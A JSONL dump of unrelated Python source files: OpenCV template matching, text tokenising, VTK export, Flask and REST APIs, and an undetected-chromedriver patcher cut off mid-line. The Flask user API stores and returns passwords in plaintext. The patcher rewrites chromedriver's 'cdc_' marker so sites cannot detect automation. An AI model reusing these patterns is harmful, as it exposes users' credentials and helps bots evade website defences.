resize the image according to the scale, and keep track\r\n # of the ratio of the resizing\r\n resized = imutils.resize(gray, width=int(gray.shape[1] * scale))\r\n r = gray.shape[1] / float(resized.shape[1])\r\n\r\n # if the resized image is smaller than the template, then break\r\n # from the loop\r\n if resized.shape[0] < tH or resized.shape[1] < tW:\r\n break\r\n \r\n # detect edges in the resized, grayscale image and apply template\r\n # matching to find the template in the image\r\n edged = cv2.Canny(resized, 50, 200)\r\n result = cv2.matchTemplate(edged, template_canny, cv2.TM_CCOEFF)\r\n (_, maxVal, _, maxLoc) = cv2.minMaxLoc(result)\r\n\r\n # if we have found a new maximum correlation value, then update\r\n # the bookkeeping variable\r\n if info is None or maxVal > info[0]:\r\n info = (maxVal, maxLoc, r, scale, tW, tH)\r\n\r\n self.info = info\r\n return info\r\n\r\n def get_start_pos(self):\r\n _, maxLoc, r, _, tW, tH = self.info\r\n return ( int(maxLoc[0] * r) ), ( int(maxLoc[1] * r) )\r\n\r\n def get_end_pos(self):\r\n _, maxLoc, r, _, tW, tH = self.info\r\n return ( int((maxLoc[0] + tW) * r) , int((maxLoc[1] + tH) * r))\r\n\r\n\r\n def draw_rectangle(self, image=None, rectangle_color=(0, 0, 255), thickness=2):\r\n if image is None:\r\n image = self.plate_image\r\n \r\n _, maxLoc, r, scale, tW, tH = self.info\r\n\r\n (startX, startY) = self.get_start_pos()\r\n (endX, endY) = self.get_end_pos()\r\n\r\n self.drew_img = cv2.rectangle(image,(startX, startY), (endX,endY), rectangle_color, thickness )\r\n return self.drew_img\r\n","sub_path":"template_matching.py","file_name":"template_matching.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"237113589","text":"import regex as re\nimport textacy\nimport unicodedata\n\nimport nltk\nfrom nltk import word_tokenize\n\nnltk.download('punkt')\n\nDEFAULT_REGEX_PATTERN = r'\\p{L}[\\p{L}\\p{P}]+\\p{L}'\nNOT_USABLE_UNICODE_CATEGORY = ['C', 'M', 'Z']\n\n\ndef unpack(text):\n ## https://en.wikipedia.org/wiki/Wikipedia:List_of_English_contractions\n\n # 's\n text = re.sub(r\"(\\b)([Ee]veryone|[Hh]e|[Hh]ow|[Ii]t|[Ss]he|[Ss]ombody|[Ss]omeone|[Ss]omebody|[Ss]omething|[Tt]hat|[Tt]here|[Tt]his|[Ww]hat|[Ww]hen|[Ww]here|[Ww]hich|[Ww]ho|[Ww]hy)'s\", r\"\\1\\2 is\", text)\n\n # 't\n text = re.sub(r\"(\\b)([Aa]re|[Cc]a|[Cc]ould|[Dd]are|[Dd]id|[Dd]oes|[Dd]o|[Hh]ad|[Hh]as|[Hh]ave|[Ii]s|[Mm]ay|[Mm]ight|[Mm]ust|[Nn]eed|[Oo]ught|[Ss]hould|[Ww]as|[Ww]ere|[Ww]ould)n't\", r\"\\1\\2 not\", text)\n\n # 'll\n text = re.sub(r\"(\\b)([Hh]e|[Hh]ow|[Ii]|[Ii]t|[Ss]he|[Tt]hat|[Tt]here|[Tt]hey|[Ww]e|[Ww]hat|[Ww]ho|[Yy]ou)'ll\", r\"\\1\\2 will\", text)\n\n # 'd\n text = re.sub(r\"(\\b)([Hh]e|[Hh]ow|[Ii]|[Ii]t|[Ss]he|[Tt]hat|[Tt]here|[Tt]hey|[Ww]e|[Ww]hat|[Ww]here|[Ww]ho|[Ww]hy|[Yy]ou)'d\", r\"\\1\\2 would\", text)\n\n # 've\n text = re.sub(r\"(\\b)([Cc]ould|[Hh]e|[Ii]|[Mm]ay|[Mm]ight|[Mm]ust|[Ss]hould|[Tt]hey|[Ww]e|[Ww]hat|[Ww]here|[Ww]ho|[Ww]ould|[Yy]ou)'ve\", r\"\\1\\2 have\", text)\n\n # 're\n text = re.sub(r\"(\\b)([Hh]ow|[Tt]hat|[Tt]here|[Tt]hese|[Tt]hey|[Tt]hose|[Ww]e|[Ww]hat|[Ww]here|[Ww]ho|[Ww]hy|[Yy]ou)'re\", r\"\\1\\2 are\", text)\n\n ### custom\n text = re.sub(r\"(\\b)(ain)'t\", r\"\\1am not\", text)\n text = re.sub(r\"(\\b)([Nn]e|[Ee]|[Oo])'er\", r\"\\1\\2ver\", text)\n text = re.sub(r\"(\\b)whomst'd've'nt\", r\"\\1who would have not\", text)\n text = re.sub(r\"(\\b)finna(\\b)\", r\"\\1fixing to\\2\", text)\n text = re.sub(r\"(\\b)gonna(\\b)\", r\"\\1going to\\2\", text)\n text = re.sub(r\"(\\b)cannot(\\b)\", r\"\\1can not\\2\", text)\n text = re.sub(r\"(\\b)gotta(\\b)\", r\"\\1got to\\2\", text)\n text = re.sub(r\"(\\b)y'all(\\b)\", r\"\\1you all\\2\", text)\n text = re.sub(r\"(\\b)(daresn't|dasn't)(\\b)\", r\"\\1dare not\\3\", text)\n text = re.sub(r\"(\\b)ma'am(\\b)\", r\"\\1mama\\2\", text)\n text = re.sub(r\"(\\b)gimme(\\b)\", r\"\\1give me\\2\", text)\n text = re.sub(r\"(\\b)(o'clock|oclock)(\\b)\", r\"\\1of the clock\\2\", text)\n\n text = re.sub(r\"(\\b)([Ii])'m'a\", r\"\\1\\2 am about to\", text)\n text = re.sub(r\"(\\b)([Ii])'m'o\", r\"\\1\\2 am going to\", text)\n text = re.sub(r\"(\\b)([Ii])'m\", r\"\\1\\2 am\", text)\n\n text = re.sub(r\"(\\b)([Ll]et)'s\", r\"\\1\\2 us\", text)\n text = re.sub(r\"(\\b)([Ww])on't\", r\"\\1\\2ill not\", text)\n text = re.sub(r\"(\\b)([Ss])han't\", r\"\\1\\2hall not\", text) \n\n text = re.sub(r\"(\\b)(ol)'(\\b)\", r\"\\1old\\3\", text)\n text = re.sub(r\"(\\b)'(tis)(\\b)\", r\"\\1it is\\3\", text)\n text = re.sub(r\"(\\b)'(twas)(\\b)\", r\"\\1it was\\3\", text)\n\n return text\n\ndef text_to_tokens(text):\n \n def can_use(tk):\n if len(tk) == 1:\n return False\n return True\n\n text = (text.encode('ascii', 'ignore')).decode('utf-8').lower()\n text = textacy.preprocess.replace_urls(text, ' ')\n\n blow_out_characters = [ '*', '(', ')', '...', '..', '[deleted]' ]\n for character in blow_out_characters:\n text = text.replace(character, ' ')\n\n text = unpack(text)\n\n ## split using word_tokenize,\n tokens = word_tokenize(text)\n slim_text = \" \".join(tokens)\n slim_tokens = re.findall(DEFAULT_REGEX_PATTERN, slim_text)\n slim_tokens = [ \n \"\".join([ ti for ti in term if unicodedata.category(ti)[0] not in NOT_USABLE_UNICODE_CATEGORY ]) for term in slim_tokens \n ]\n\n return slim_tokens","sub_path":"src/reddit/text_helpers.py","file_name":"text_helpers.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"366662294","text":"import numpy as np\nimport os\nimport model\nimport glob\ndef enveloppeVTK(filename,model,*args):\n\t'''\n\tvtk export\n\tfunction exportVTK(filename,model)\n\tcreates a directory with the vtk files for displays in paraview\n\t(only work for triangle and wedges based on their number of nodes)\n\t\n\tGive only the results for nw but could be extended to geometry, mask... \n\t\n\tinput: filename destination \n\t(string)\n\t------------------------------------------------------------------\nmodel this is md \n\t------------------------------------------------------------------\n\tBy default only the results are exported, you can add whichever\n\tfield you need as a string:\n\tadd 'geometry' to export md.geometry\n\n\tBasile de Fleurian:\n\t'''\n\tDir=os.path.basename(filename)\n\tPath=filename[:-len(Dir)]\n\n\tif os.path.exists(filename):\n\t\tprint ('File {} allready exist'.format(filename))\n\t\tnewname=raw_input('Give a new name or \"delete\" to replace: ')\n\t\tif newname=='delete':\n\t\t\tfilelist = glob.glob(filename+'/*')\n\t\t\tfor oldfile in filelist:\n\t\t\t\tos.remove(oldfile)\n\t\telse:\n\t\t\tprint ('New file name is {}'.format(newname))\n\t\t\tfilename=newname\n\t\t\tos.mkdir(filename)\n\telse:\n\t\tos.mkdir(filename)\n\n\tIsEnveloppe=np.where(model.mesh.vertexonbase | model.mesh.vertexonsurface)\n\t#get the element related variables\n\tif 'z' in dict.keys(model.mesh.__dict__):\n\t\tpoints=np.column_stack((model.mesh.x,model.mesh.y,model.mesh.z))\n\t\tnum_of_elt=np.size(np.isnan(model.mesh.lowerelements))+np.size(np.isnan(model.mesh.upperelements))\n\t\tlow_elt_num=np.size(np.isnan(model.mesh.lowerelements))\n\t\ttop_elt_num=np.size(np.isnan(model.mesh.upperelements))\n\telse:\n\t\tpoints=np.column_stack((model.mesh.x,model.mesh.y,np.zeros(np.shape(model.mesh.x))))\n\t\tnum_of_elt=np.shape(model.mesh.elements)[0]\n\t\t\n\tnum_of_points=np.size(points)[0]\n\tdim=np.size(points)[1]\n\tpoint_per_elt=np.shape(model.mesh.elements)[1]\n\t\t\n\tcelltype=5 #triangles\n\t\n\t#this is the result structure\n\tres_struct=model.results\n\tif (len(res_struct.__dict__)>0):\n\t\t#Getting all the solutions of the model\n\t\tsolnames=(dict.keys(res_struct.__dict__))\n\t\tnum_of_sols=len(solnames)\n\t\tnum_of_timesteps=1\n\t\t#%building solutionstructure \n\t\tfor solution in solnames:\n\t\t\t#looking for multiple time steps\n\t\t\tif (np.size(res_struct.__dict__[solution])>num_of_timesteps):\n\t\t\t\tnum_of_timesteps=np.size(res_struct.__dict__[solution])\n\t\t\t\tnum_of_timesteps=int(num_of_timesteps)+1\n\telse:\n\t\tnum_of_timesteps=1\n\n\tfor step in range(0,num_of_timesteps):\n\t\ttimestep=step\n\t\tfid=open((filename +'/Timestep.vtk'+str(timestep)+'.vtk'),'w+')\n\t\tfid.write('# vtk DataFile Version 2.0 \\n')\n\t\tfid.write('Data for run %s \\n' % model.miscellaneous.name)\n\t\tfid.write('ASCII \\n')\n\t\tfid.write('DATASET UNSTRUCTURED_GRID \\n')\n\t\tfid.write('POINTS %d float\\n' % num_of_points)\n\t\tfor point in points:\n\t\t\tfid.write('%f %f %f \\n'%(point[0], point[1], point[2]))\n\t\t\t\n\t\tfid.write('CELLS %d %d\\n' %(num_of_elt, num_of_elt*(point_per_elt+1)))\n\n\t\t# \tif exist('low_elt_num')\n\t\t# triaconnect=zeros(num_of_elt,3);\n\t\t# triaconnect(1:low_elt_num,:)=model.mesh.elements(find(isnan(model.mesh.lowerelements)),1:3);\n\t\t# upshift=-min(min(model.mesh.elements(find(isnan(model.mesh.upperelements)),4:6)))+1+max(max(model.mesh.elements(find(isnan(model.mesh.lowerelements)),1:3)));\n\t\t# triaconnect(1+low_elt_num:num_of_elt,:)=model.mesh.elements(find(isnan(model.mesh.upperelements)),4:6)+upshift;\n\t\t# fprintf(fid,s,[(3)*ones(num_of_elt,1) triaconnect-1]');\n\t\tfor elt in range(0, num_of_elt):\n\t\t\n\t\t\tfid.write('3 %d %d %d\\n' %(model.mesh.elements[elt,0]-1,model.mesh.elements[elt,1]-1,model.mesh.elements[elt,2]-1))\n\t\t\n\t\tfid.write('CELL_TYPES %d\\n' %num_of_elt)\n\t\tfor elt in range(0, num_of_elt):\n\t\t\tfid.write('%d\\n' %celltype)\n\n\t\tfid.write('POINT_DATA %s \\n' %str(num_of_points))\n\t\n\t\t#loop over the different solution structures\n\t\tif 'solnames' in locals():\n\t\t\tfor sol in solnames:\n\t\t\t\t#dealing with results on different timesteps\n\t\t\t\tif(np.size(res_struct.__dict__[sol])>timestep):\n\t\t\t\t\ttimestep = step\n\t\t\t\telse:\n\t\t\t\t\ttimestep = np.size(res_struct.__dict__[sol])\n\t\t\t\t\n\t\t\t\t#getting the fields in the solution\n\t\t\t\tif(np.size(res_struct.__dict__[sol])>1):\n\t\t\t\t\tfieldnames=dict.keys(res_struct.__dict__[sol].__getitem__(timestep-1).__dict__)\n\t\t\t\telse:\n\t\t\t\t\tfieldnames=dict.keys(res_struct.__dict__[sol].__dict__)\n\t\t\t\t#check which field is a real result and print\n\t\t\t\tfor field in fieldnames:\n\t\t\t\t\tif(np.size(res_struct.__dict__[sol])>1):\n\t\t\t\t\t\tfieldstruct=res_struct.__dict__[sol].__getitem__(timestep-1).__dict__[field]\n\t\t\t\t\telse:\n\t\t\t\t\t\tfieldstruct=res_struct.__dict__[sol].__dict__[field]\n\n\t\t\t\t\tif ((np.size(fieldstruct))==num_of_points):\n\t\t\t\t\t\tfid.write('SCALARS %s float 1 \\n' % field)\n\t\t\t\t\t\tfid.write('LOOKUP_TABLE default\\n')\n\t\t\t\t\t\tfor node in range(0,num_of_points):\n\t\t\t\t\t\t\t#paraview does not like NaN, replacing\n\t\t\t\t\t\t\tif np.isnan(fieldstruct[node]):\n\t\t\t\t\t\t\t\tfid.write('%e\\n' % -9999.9999)\n\t\t\t\t\t\t\t#also checking for verry small value that mess up\n\t\t\t\t\t\t\telif (abs(fieldstruct[node])<1.0e-20):\n\t\t\t\t\t\t\t\tfid.write('%e\\n' % 0.0)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tfid.write('%e\\n' % fieldstruct[node])\n\t\t\t\t\t\n\t\t#loop on arguments, if something other than result is asked, do\n\t\t#it now\n\t\tfor other in args:\n\t\t\tother_struct=model.__dict__[other]\n\t\t\tothernames=(dict.keys(other_struct.__dict__))\n\t\t\tfor field in othernames:\n#\t\t\t\tfprintf(fid,s,res_struct.(fieldnames{k})(IsEnveloppe));\n\t\t\t\tif ((np.size(other_struct.__dict__[field]))==num_of_points):\n\t\t\t\t\tfid.write('SCALARS %s float 1 \\n' % field)\n\t\t\t\t\tfid.write('LOOKUP_TABLE default\\n')\n\t\t\t\t\tfor node in range(0,num_of_points):\n\t\t\t\t\t\t#paraview does not like NaN, replacing\n\t\t\t\t\t\tif np.isnan(other_struct.__dict__[field][node]):\n\t\t\t\t\t\t\tfid.write('%e\\n' % -9999.9999)\n\t\t\t\t\t\t#also checking for verry small value that mess up\n\t\t\t\t\t\telif (abs(other_struct.__dict__[field][node])<1.0e-20):\n\t\t\t\t\t\t\tfid.write('%e\\n' % 0.0)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfid.write('%e\\n' % other_struct.__dict__[field][node])\n\tfid.close();\n","sub_path":"trunk/src/m/contrib/defleurian/paraview/enveloppeVTK.py","file_name":"enveloppeVTK.py","file_ext":"py","file_size_in_byte":5890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"599522341","text":"try:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nconfig = {\n 'name': 'termite',\n 'description': 'A simple tool to find intrinsic terminators in a nucleotidic bacterial genome using Machine Learning.',\n 'author': 'Miravet-Verde, Samuel',\n 'url': '',\n 'download_url': 'https://github.com/smv818vms/termite',\n 'author_email': 'samuel.miravet@crg.eu',\n 'version': '0.0.1',\n 'license': \"MIT\",\n 'install_requires': ['Biopython', 'numpy'],\n 'packages': ['termite'],\n 'scripts': ['bin/termite']\n}\n\nsetup(**config)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"297025932","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport base64\nimport numpy as np\nfrom PIL import Image\nimport requests\nimport io\nimport matplotlib.pylab as plb\nfrom keras.models import load_model\nfrom flask import request, jsonify, Flask\nfrom measures import measures\n\n# In[2]:\n\n\napp = Flask(__name__)\n# In[3]:\n\n\ndef get_model():\n global model\n model = load_model('my_ResNet50_model.h5')\n print(\"Model loaded\")\n\n\n# In[4]:\n\n\ndef download_image_preprocess(url,target_size):\n r = requests.get(url, timeout=4.0)\n if r.status_code != requests.codes.ok:\n assert False, 'Status code error: {}.'.format(r.status_code)\n\n with Image.open(io.BytesIO(r.content)) as im:\n im = im.resize(target_size)\n I = np.asarray(im)\n #print(\"Before expanding\" , I.shape)\n #plb.imshow(I)\n I = np.expand_dims(I,axis=0)\n #print(\"After Expanding \",I.shape)\n return I\n\n\n# In[5]:\n\n\nprint(\"Loading keras model....\")\nget_model()\n\n\n# In[6]:\n\n\nimg = download_image_preprocess(\"https://firebasestorage.googleapis.com/v0/b/fir-authui-9c7da.appspot.com/o/crop_photo%2F1a2da798-3f89-4379-90b0-d04951adb782___FAM_L.Blight%203645.JPG?alt=media&token=2eb586d7-d849-4053-b895-68a14880c681\",target_size=(227,227))\nprint(\"Function returned \", img.shape)\n#plb.imshow(img[0])\nprint(\"It worked internally\")\n\n\n# In[7]:\n\n\nprediction = model.predict(img)\nprint(prediction.argmax())\n\n\n# In[6]:\n\ncropDisease={\n0:\"apple_scab\",\n1:\"apple_Black_rot\",\n2:\"apple_cedar_apple_rust\",\n3:\"apple_Healthy\",\n4:\"blueberry_Healthy\",\n5:\"cherry_Powdery_Mildew\",\n6:\"cherry_Healthy\",\n7:\"corn_Grayspot\",\n8:\"corn_Common_rust\",\n9:\"corn_Northern_Leaf_Blight\",\n10:\"corn_Healthy\",\n11:\"grape_Black_rot\",\n12:\"grape_Black_Measles\",\n13:\"grape_Leaf_blight_(Isariopsis_Leaf_Spot)\",\n14:\"grape_Healthy\",\n15:\"orange_Haunglongbing_(Citrus_greening)\",\n16:\"peach_Bacterial_spot\",\n17:\"peach_Healthy\",\n18:\"bellpepper_Bacterial_spot\",\n19:\"bellpepper_Healthy\",\n20:\"potato_Early_blight\",\n21:\"potato_Late_blight\",\n22:\"potato_Healthy\",\n23:\"raspberry_healthy\",\n24:\"soybean_healthy\",\n25:\"squash_Powdery_mildew\",\n26:\"strawberry_Leaf_scorch\",\n27:\"strawberry_Healthy\",\n28:\"tomato_Bacterial_spot\",\n29:\"tomato_Early_blight\",\n30:\"tomato_Late_blight\",\n31:\"tomato_Leaf_Mold\",\n32:\"tomato_Septoria_leaf_spot\",\n33:\"tomato_Spider_mites\",\n34:\"tomato_Target_Spot\",\n35:\"tomato_Tomato_Yellow_Leaf_Curl_Virus\",\n36:\"tomato_Tomato_mosaic_virus\",\n37:\"tomato_healthy\"\n}\n\n@app.route(\"/predict\" , methods=[\"POST\"])\ndef predict():\n message = request.get_json(force = True)\n url = message['image_url']\n print(\"URL \" , url)\n processed_image = download_image_preprocess(url, target_size=(227,227))\n prediction = model.predict(processed_image)\n prediction = prediction.argmax()\n\n response = {\n 'prediction' : cropDisease[int(prediction)],\n 'measures':measures[int(prediction)]\n }\n \n return jsonify(response)\n\n\n@app.route('/')\ndef hello_world():\n return 'Hey its working. lets try post methods'\n\nif __name__ == \"__main__\":\n\tapp.run(host='0.0.0.0')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"301662040","text":"from rest_framework.decorators import api_view\n# from rest_framework.reverse import reverse\nfrom rest_framework.response import Response\n\nfrom server.api.v1.utils.utils import get_res\n\n@api_view(['GET'])\ndef api_v1(request):\n \"\"\"The entry endpoint of our v1 API\"\"\"\n\n return Response({\n 'commands' : ['lines'],\n\n })\n\n\n@api_view(['GET'])\ndef get_query_result(request):\n res = get_res(request)\n return Response({\n 'commands' : ['lines'],\n\n })\n","sub_path":"server/api/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"399485865","text":"\nimport bson\nimport flask\nimport pymongo \n\napp = flask.Flask(__name__)\n\nclient = pymongo.MongoClient()\ndb = client.coffee # use coffee\n\n\n@app.errorhandler(404)\ndef handler_404(err):\n return '#FODA-SE'\n\n@app.route('/hello-world')\ndef get_hello_world():\n return 'hello, world'\n\n@app.route('/users', methods= [ 'GET' ])\ndef get_users():\n \n users = [{\n 'id': str(u.get('_id')),\n 'name': u.get('name'),\n 'email': u.get('email'),\n 'password': u.get('password')\n } for u in db.users.find() ]\n \n return flask.jsonify(users)\n\n@app.route('/users', methods = [ 'POST' ])\ndef create_user():\n \n db.users.insert(flask.request.json)\n \n return flask.jsonify({ \n 'mensagem' : 'usuario cadastrado'\n })\n\n@app.route('/users/', methods = [ 'GET' ])\ndef get_user_by_id(userid):\n \n user = db.users.find_one({\n '_id': bson.ObjectId(userid)\n })\n \n return flask.jsonify({\n 'id': str(user.get('_id')),\n 'name': user.get('name'),\n 'email': user.get('email'),\n 'password': user.get('password')\n })\n \n@app.route('/users/', methods=[ 'PUT', 'PATCH'])\ndef update_user_by_id(userid):\n \n user = {\n '_id' : bson.ObjectId(userid) \n }\n db.users.update(user, { \n '$set' : flask.request.json\n })\n \n user = db.users.find_one({\n '_id': bson.ObjectId(userid)\n })\n \n return flask.jsonify({\n 'id': str(user.get('_id')),\n 'name': user.get('name'),\n 'email': user.get('email'),\n 'password': user.get('password')\n })\n \n@app.route('/users/', methods= [ 'DELETE' ])\ndef delete_user_by_id(userid):\n \n db.users.remove({\n '_id': bson.ObjectId(userid) \n })\n \n return flask.jsonify({ 'msg' : 'Usuário removido com sucesso' }) \n\n@app.route('/soma', methods = [ 'POST' ])\ndef soma():\n numeros = flask.request.json.get('numeros')\n \n if not numeros:\n return 'Chave \"números\" não encontrada', 400\n \n if type(numeros) is not list:\n return 'numeros, deve ser uma lista', 400\n \n return flask.jsonify({\n 'soma': sum(numeros)\n }), 200\n \n \n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"aula02/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"534077800","text":"from coreapi import Document\nfrom api_star import validators\nfrom api_star.decorators import validate\nfrom api_star.exceptions import NotFound\nfrom api_star.frameworks.falcon import App\nfrom api_star.renderers import CoreJSONRenderer, DocsRenderer\nimport uuid\n\n\napp = App(title='Notes API')\n\n\ndef lookup(note_id):\n for note in notes:\n if note['id'] == note_id:\n return note\n raise NotFound()\n\n\ndef get_id():\n return '%s' % uuid.uuid4()\n\n\nnotes = [\n {'id': get_id(), 'description': 'Meet someone', 'complete': True},\n {'id': get_id(), 'description': 'Walk somewhere', 'complete': False},\n {'id': get_id(), 'description': 'Do something', 'complete': False},\n]\n\n\n@app.get('/', renderers=[CoreJSONRenderer(), DocsRenderer()], exclude_from_schema=True)\ndef schema():\n \"\"\"\n Return the API schema.\n \"\"\"\n return app.schema\n\n\n@app.get('/notes/')\ndef list_notes():\n \"\"\"\n Returns all existing notes.\n \"\"\"\n return notes\n\n\n@app.post('/notes/')\n@validate(description=validators.text(max_length=100))\ndef create_note(description):\n \"\"\"\n Creates a new note.\n\n * description - A short description of the note.\n \"\"\"\n note = {'id': get_id(), 'description': description, 'complete': False}\n notes.insert(0, note)\n return note\n\n\n@app.get('/notes/{note_id}/')\ndef read_note(note_id):\n \"\"\"\n Reads a single note.\n\n * note_id - A unique ID string for the note.\n \"\"\"\n note = lookup(note_id)\n return note\n\n\n@app.put('/notes/{note_id}/')\n@validate(\n description=validators.text(max_length=100),\n complete=validators.boolean()\n)\ndef update_note(note_id, description=None, complete=None):\n \"\"\"\n Update a note.\n\n * note_id - A unique ID string for the note.\n * [description] - A short description of the note.\n * [complete] - True if the task has been completed, false otherwise.\n \"\"\"\n note = lookup(note_id)\n if description is not None:\n note['description'] = description\n if complete is not None:\n note['complete'] = complete\n\n return note\n\n\n@app.delete('/notes/{note_id}/')\ndef delete_note(note_id):\n \"\"\"\n Deletes a note.\n\n * note_id - A unique ID string for the note.\n \"\"\"\n note = lookup(note_id)\n notes.remove(note)\n return ''\n","sub_path":"examples/todo_falcon.py","file_name":"todo_falcon.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"248014625","text":"import io\nimport json\nimport logging\nimport os\nimport random\nimport re\nimport string\nimport sys\nimport zipfile\nfrom distutils.version import LooseVersion\nfrom urllib.request import urlopen, urlretrieve\n\nlogger = logging.getLogger(__name__)\n\nIS_POSIX = sys.platform.startswith((\"darwin\", \"cygwin\", \"linux\"))\n\n\nclass Patcher(object):\n root_dir = os.path.dirname(__file__)\n\n url_repo = \"https://chromedriver.storage.googleapis.com\"\n zip_name = \"chromedriver_%s.zip\"\n exe_name = \"chromedriver%s\"\n\n platform = sys.platform\n if platform.endswith(\"win32\"):\n zip_name %= \"win32\"\n exe_name %= \".exe\"\n if platform.endswith(\"linux\"):\n zip_name %= \"linux64\"\n exe_name %= \"\"\n if platform.endswith(\"darwin\"):\n zip_name %= \"mac64\"\n exe_name %= \"\"\n\n # if platform.endswith(\"win32\"):\n # d = \"~/appdata/roaming/undetected_chromedriver\"\n # elif platform.startswith(\"linux\"):\n # d = \"~/.local/share/undetected_chromedriver\"\n # elif platform.endswith(\"darwin\"):\n # d = \"~/Library/Application Support/undetected_chromedriver\"\n # else:\n # d = \"~/.undetected_chromedriver\"\n # data_path = os.path.abspath(os.path.expanduser(d))\n data_path = os.path.dirname(__file__)\n\n def __init__(self, executable_path=None, force=False, version_main: int = 0, download_version: bool = True):\n \"\"\"\n Args:\n executable_path: None = automatic\n a full file path to the chromedriver executable\n force: False\n terminate processes which are holding lock\n version_main: 0 = auto\n specify main chrome version (rounded, ex: 82)\n \"\"\"\n\n self.force = force\n self.executable_path = None\n\n if not executable_path:\n self.executable_path = os.path.join(self.data_path, self.exe_name)\n\n if not IS_POSIX:\n if executable_path:\n if not executable_path[-4:] == \".exe\":\n executable_path += \".exe\"\n\n self.zip_path = os.path.join(self.data_path, self.zip_name)\n\n if not executable_path:\n self.executable_path = os.path.abspath(\n os.path.join(\".\", self.executable_path)\n )\n\n self._custom_exe_path = False\n\n if executable_path:\n self._custom_exe_path = True\n self.executable_path = executable_path\n self.version_main = version_main\n self.version_full = None\n\n def auto(self, executable_path=None, force=False, version_main=None, download_version=True):\n \"\"\"\"\"\"\n if executable_path:\n if os.path.exists(executable_path):\n self.executable_path = executable_path\n self._custom_exe_path = True\n\n if self._custom_exe_path:\n ispatched = self.is_binary_patched(self.executable_path)\n if not ispatched:\n return self.patch_exe()\n else:\n return\n\n if force is True:\n self.force = force\n\n try:\n os.unlink(self.executable_path)\n except PermissionError:\n if self.force:\n self.force_kill_instances(self.executable_path)\n return self.auto(force=not self.force)\n try:\n if self.is_binary_patched():\n # assumes already running AND patched\n return True\n except PermissionError:\n pass\n # return False\n except FileNotFoundError:\n pass\n\n if version_main:\n self.version_main = version_main\n release = self.fetch_release_number()\n # self.version_main = release.version[0]\n self.version_full = release\n # self.unzip_package(self.fetch_package())\n else:\n chrome_version = self.get_chrome_version()\n print(f'Chrome version: {chrome_version}')\n if chrome_version:\n release = chrome_version\n # self.version_main = release.version[0]\n self.version_full = self.fetch_release_number()\n else:\n release = self.fetch_release_number()\n # self.version_main = release.version[0]\n self.version_full = release\n self.version_main = release.version[0]\n self.unzip_package(self.fetch_package())\n\n return self.patch()\n\n def patch(self):\n self.patch_exe()\n return self.is_binary_patched()\n\n def fetch_release_number(self):\n \"\"\"\n Gets the latest major version available, or the latest major version of self.target_version if set explicitly.\n :return: version string\n :rtype: LooseVersion\n \"\"\"\n path = \"/latest_release\"\n if self.version_main:\n path += f\"_{self.version_main}\"\n path = path.upper()\n logger.debug(\"getting release number from %s\" % path)\n return LooseVersion(urlopen(self.url_repo + path).read().decode())\n\n def parse_exe_version(self):\n with io.open(self.executable_path, \"rb\") as f:\n for line in iter(lambda: f.readline(), b\"\"):\n match = re.search(br\"platform_handle\\x00content\\x00([0-9.]*)\", line)\n if match:\n return LooseVersion(match[1].decode())\n\n def fetch_package(self):\n \"\"\"\n Downloads ChromeDriver from source\n :return: path to downloaded file\n \"\"\"\n u = \"%s/%s/%s\" % (self.url_repo, self.version_full.vstring, self.zip_name)\n logger.debug(\"downloading from %s\" % u)\n print('Скачивание драйвера с: ', u)\n dwl_path = os.path.join(self.data_path, self.zip_name)\n # dwl_path = self.zip_name\n print('Путь до zip файла: ', dwl_path)\n return urlretrieve(u, dwl_path)[0]\n\n def unzip_package(self, fp):\n \"\"\"\n Does what it says\n :return: path to unpacked executable\n \"\"\"\n logger.debug(\"unzipping %s\" % fp)\n # try:\n # os.unlink(self.zip_path)\n # except (FileNotFoundError, OSError):\n # pass\n\n # os.makedirs(self.data_path, mode=0o755, exist_ok=True)\n\n with zipfile.ZipFile(fp, mode=\"r\") as zf:\n zf.extract(self.exe_name, os.path.dirname(self.executable_path))\n os.remove(fp)\n os.chmod(self.executable_path, 0o755)\n return self.executable_path\n\n @staticmethod\n def force_kill_instances(exe_name):\n \"\"\"\n kills running instances.\n :param: executable name to kill, may be a path as well\n :return: True on success else False\n \"\"\"\n exe_name = os.path.basename(exe_name)\n if IS_POSIX:\n r = os.system(\"kill -f -9 $(pidof %s)\" % exe_name)\n else:\n r = os.system(\"taskkill /f /im %s\" % exe_name)\n return not r\n\n @staticmethod\n def gen_random_cdc():\n cdc = random.choices(string.ascii_lowercase, k=26)\n cdc[-6:-4] = map(str.upper, cdc[-6:-4])\n cdc[2] = cdc[0]\n cdc[3] = \"_\"\n return \"\".join(cdc).encode()\n\n def is_binary_patched(self, executable_path=None):\n \"\"\"simple check if executable is patched.\n :return: False if not patched, else True\n \"\"\"\n executable_path = executable_path or self.executable_path\n with io.open(executable_path, \"rb\") as fh:\n for line in iter(lambda: fh.readline(), b\"\"):\n if b\"cdc_\" in line:\n return False\n else:\n return True\n\n def patch_exe(self):\n \"\"\"\n Patches the ChromeDriver binary\n :return: False on failure, binary name on success\n \"\"\"\n logger.info(\"patching driver executable %s\" % self.executable_path)\n\n linect = 0\n replacement = self.gen_random_cdc()\n with io.open(self.executable_path, \"r+b\") as fh:\n for line in iter(lambda: fh.readline(), b\"\"):\n if b\"cdc_\" in line:\n fh.seek(-len(line), 1)\n newline = 